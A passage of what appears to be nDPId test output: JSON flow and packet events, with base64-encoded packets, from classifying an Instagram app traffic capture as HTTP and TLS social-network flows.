mN4wtVBz4xoAKljf4v6tXAUt\/sabl0bLkuRE5KikyGgBCbojsrcdwSEGEBomIUFpEl4TvPOqQ8EQF08if3O9FnhnUw2jwQHpaPsw+3EzgNs0zWy6OB623FWGwH7yRctwfDWnw6uSz7AvbHpmHBs+lzanaBkBBq2DLF24dyAfJ1fyW2F8GD9sWLVnjCGZF3EsLst8bQIxxKOwYkoOS2WRsw0xVMJlnywe3Dcc8w+9gQNiBfxyDpYA\/BXzFgEQ3SDtI\/Iov2XBZk1lmPY59tj\/SH+23V5dy\/iiOkLW8UdeiSozNTMFJIdoa309Kn34h+DTnlxZPJVqKRj7du3Uk37CetFC6vFxS2151HHC6aWXemK7B3BpAILjJ\/RL8v0ZA5dOz14w3bAaJWBEg+oUMkesS4WzNnMtGFzWDqZOmcWARMZvW5QUXehDRGok1aYS2VUwcI4nRFkmR4HYk3YsQQ7hbSjts4wBuESi5cIWAPkICk+lgVslThZsIux2ZS+mHik4DwoYI7IF8QlYXTsSiw2By7i5s7AeQhpAzljeQfkQaQPQMK5P3IVCAQHZWMgI="}
00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":255,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720900690,"flow_last_seen":1436720901259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24614,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":1436720901259,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"thread_ts_msec":1436720901262,"pkt":"ABsv8H60QPMIw47hCABFAAE2VBZAAEAGt67AqABnUlUamZHmAFCdoJYSxR9Z0oAYDfbnvwAAAQEICgAD66tZ6cc2R0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMjQ4ODI5Xzg1Mzc4MjEyMTM3Mzk3Nl85MDk5MzY5MzRfbi5qcGc\/c2U9NyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWEuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"}
00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898354,"flow_last_seen":1436720898354,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720898354,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436720898354,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898354,"pkt":"ABsv8H60QPMIw47hCABFAAA8TypAAEAGEYLAqABnrfxrBNw+AbsehKWiAAAAAKACOQjaPgAAAgQFtAQCCAoAA+qIAAAAAAEDAwY="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7560000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1436720898386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1431,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1431,"pkt_l4_len":1397,"thread_ts_msec":1436720898386,"pkt":"ABsv8H60QPMIw47hCABFAAWJa5BAAEAGjI7AqABnHw1dNISQAbuIwY4ypNSTmIAYARMTGgAAAQEICgAD6otaUmp7FwMBBVB9SXVyqGN\/Z0IQOrRWeDqy2ESAojaAx4QQZK8Nvn9P2WG4BrAo87sybB9iQ6L07zu3SJx\/yEENym+6oXOIueLurovz4xM5H+e2VkXRxNwq2D0zbcPaARfl1kqZ5lxozT2KxP5upnv5ZlZknUeHJ9iJUeI933878+9Wa2p3jAkSn4v+PhMZ8tdKr\/DbC4Dao9UoiB0NXUAr3Yz5mLZxqwvhp7T5JBYmrpug0k+c+c5jewd+5zMMLlTOh9zrkFpN\/SPdxljY89SWMG4iWok6qAWd81044WQFB8MMk6d1YEgnl4MTRR4s5nra0RAZ\/18nINKDy\/+7OtbIdykHRTDGdkzNglojGhlbMwXwCoSaU7eaC\/UG3QHuANJheRiTxBbb9LObDO61gFXBkdpo\/nFCQJ5DEAR9LRi5VbgUevhOk8v2CnW3NfU8tU\/NhXT2Fwav0PyuAxlku4R0TFjGrX0lMbSi5TfJsyWyqS9JUaHL9+9Lo2MolHMixycuQJ8OBJfxMjbh4vndGe6E5xjywRDhon5Ivpm51kbX7pr85erPPQ5esyd11\/S2GN1nyosTrQfKPFTMJ2PKe2m7QTQt+uAz\/lbUTHbMP5WXngggI0bC1v64BOTbVZvk5uSBRBJTxfNNwpu5Mu42yT2kpORmWxKLjzXxHI3WY0zq00CLVkZ1W4ZdSNXs14xkPKnh8GETvWNyrC0OkJAC\/senhsF4RXOoqIV\/fvDhI7Lz\/aB3VqgZGkZTiT2tG0nkNbTl36TNhCL0NMIpdEkg3CtkeHnRpYXxlFUaqjl0oiNlqmXrT3txeOlkpgLeE8sil6hQeUXLUDxeB\/KJ3hVWQV57tvquoi3TQ0mdlDPh3nKxwFekfGvexzie5JWVEiecROjBicDHlMGZSqgfGOOL9obBhKFQKyGkKwqvDD0GLpn+uVlqpq4HgYehGmZsXkGfKjhOvgYnCN46aHecrF2yix3uKy9HcGVhEh0jdkP6ZVKeYPjfh1VormnzwC798pJrA6FXeukKkQhENaxtIfjtfZqrhxgkGn44Wi6ohn6pe\/FHHmbNcPgV6V8fsqp75GNTcdW4payqjcXiRcbHyE8T1\/Qx4baiJDp6KLsZS4gAneRh+ALhxukKM03jbRUClXAh8oRiLl0u+SOlflfwh8goOCkzbht0yzBBd5s+YE\/rKLvLODamT6vRSajD988ioyLCTi6O7PjCpIz0x86CPfl59RFLMWfW1DDNxLLiQpG5QmdGA\/0xKZPtgucNxJfMg8zisuAsBotSOZNTt7iyYW\/IMjbjZfUDk2XnW0FMevjvN1dNSzxncEScDgEwhOZR\/bPFjnmrDfWVV5x9BRHI5MP8wUwSlhypizc+qxTGIgicImjYGkhAIz+xcFmXadM0YNZEvMZaj9aBOHMX1Oble6EYxmSHOrpQKqfzbWeMlvwrQYuci0kLy\/\/bshVduwlDBy5JYqDunQnZyDGNhNVfyaH+ng8KQ6sBqINnITFXfAnCkwXV\/HK1iUkb7QzoqBn3gpftCp83hNH0foudA8Gdf6kurlWwgMEOXi5BfTqlD4DwASXt9A68u1P9Zz8s0alrX2UlusB6fvL9Q9Js6MLwiQyj+bjdEcQ3Uplwrw6qLdouhHzsdgkMnVdwc2l5wv8KPOcXqmQvqjndZFz1nXaAVhwsFoo1zwY3LiNiYjhwWSYaeCHLdPVBHtAjW1OZFou+zyYe9X36AFhBBqrW+04QrWGvIhn1jD27wWhOa1bAC4ScjrpH0lKPe5njeedOXaKkZFE++EHilCzyFRBq6mDF3sb10u4yUIsQcfD4LLSh"}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1436720898475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898475,"pkt":"QPMIw47hABsv8H60CABFAAA05iNAAFUGAlAfDV00wKgAZwG7hJCk1JOYiMGTh4AQAE5t9QAAAQEIClpSq0YAA+qL"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1436720898499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898499,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAAFIGTqyt\/GsEwKgAZwG73D5XFMWUHoSlo6ASOJBK1AAAAgQFlgQCCAq8TYT0AAPqiAEDAwg="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1436720898499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898499,"pkt":"ABsv8H60QPMIw47hCABFAAA0TytAAEAGEYnAqABnrfxrBNw+AbsehKWjVxTFlYAQAOXaNgAAAQEICgAD6pe8TYT0"}
00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1436720898551,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720898551,"pkt":"QPMIw47hABsv8H60CABFAAKZ5iRAAFUG\/+kfDV00wKgAZwG7hJCk1JOYiMGTh4AYAE6DfwAAAQEIClpSq5UAA+qLFwMBAmB3TNLiDxMdaG\/77FJR8O6B7ETM5PL1YEwRicjM0iP0UHaAjwUM69tZJRboKPSJSylQ1372woiRMUoGT0dkqivXwS77nykGpDpQxH2zG\/qLmXj10Apbm9mNJzojbuGkVAQeXciVaLovJfxV8pe4ApuOMtqX+wzNa0ZzIxrRfdGy1r+REoc96\/duttzeccU7r8F+0sSj4kAMBptpjPxHIWmQ8bvcQmsOZTBbtWqbInBydwnOzZKHuUG4UpWsNoKQLrxSa1ETAsjugoyEe5PPT8+cb8Irh4mKsNfbStX5KDjpe9Dme8aKUCL1ceYHHjALeMY9l4fx2o0KIF6TukGkzvqR8cZ+qcyDG5U\/HYh5lxYTcHS7lDXS1PzV6XOR41h1cZ9L+KxXE6JczRHCSiNT1VF7boI4Qizj5lEdfdajhSQHOEg16UAhsZHpgK1G5Iki1ek6rdWyUqwchJMZYUThaRdJpKv9RM0OW9cAtKW4cZKenq0TEdOPDEBRCwskRboA6Gi3YnhJ3qdvDGkTLGo9t+FpkGczAZZn4gKC4xoEybQb10OFqFb4BP0BHlc1dmzqbYjWeEKW2wJjaNEaqdUvlusDaKzJPAfd\/FC3qcdqBy6RoP1rw6AWfXgFirXb5SF1IsZGaICO7Vi\/A05NBIj2TN+sAkrMTvlnJxzijI3OS4z\/O7pdS0yJ1AhdM2CbNqiTSP1\/fSWG2i895LYIERx7TAiABxyhh9ufac6WLn1D9wJV86snpuHfJEPWipx7pSJs20IjfVBIUe\/onrcoOjL6GotP95FotxVNOdpbLqczmpv1mQ=="}
01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1436720900684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720900684,"pkt":"ABsv8H60QPMIw47hCABFAAE4wXBAAEAGQn\/AqABnLiFGoJegAFCP9SVkp0jV34AYH+olJAAAAQEICgAD63Ga3vWjR0VUIC9ocGhvdG9zLWFrLXhhcDEvdDUxLjI4ODUtMTUvZTM1LzEwODU5OTk0XzEwMDk0MzM3OTI0MzQ0NDdfMTYyNzY0NjA2Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtaC5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="}
00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7560000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1436720900687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":319,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":319,"pkt_l4_len":285,"thread_ts_msec":1436720900687,"pkt":"ABsv8H60QPMIw47hCABFAAEx0CVAAEAGO5vAqABnUlUaouJQAFA6kgvvKZIczIAYH0cqkQAAAQEICgAD63FWCuc2R0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTE1LzExMzg2NTI0XzExMDI1NzYxOTMxNzQzMF8zNzk1MTM2NTRfbi5qcGcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1nLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="}
00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7560000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1436720900690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900690,"pkt":"ABsv8H60QPMIw47hCABFAAE3v7dAAEAGS+vAqABnUlUauq1bAFCj1oFKfMvpWoAYDTz8dgAAAQEICgAD63JUYaBjR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExMzc5MTQ4XzE0NDkxMjAyMjg3NDUzMTZfNjA3NDc3OTYyX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1lLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="}
00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1436720900692,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900692,"pkt":"ABsv8H60QPMIw47hCABFAAE3iBFAAEAGg5LAqABnUlUaueJtAFAE8EMOWjfyZYAYD+bdMQAAAQEICgAD63JZ6ogYR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExNDI0NjIzXzE2MDgxNjMxMDk0NTA0MjFfNjYzMzE1ODgzX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1mLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="}
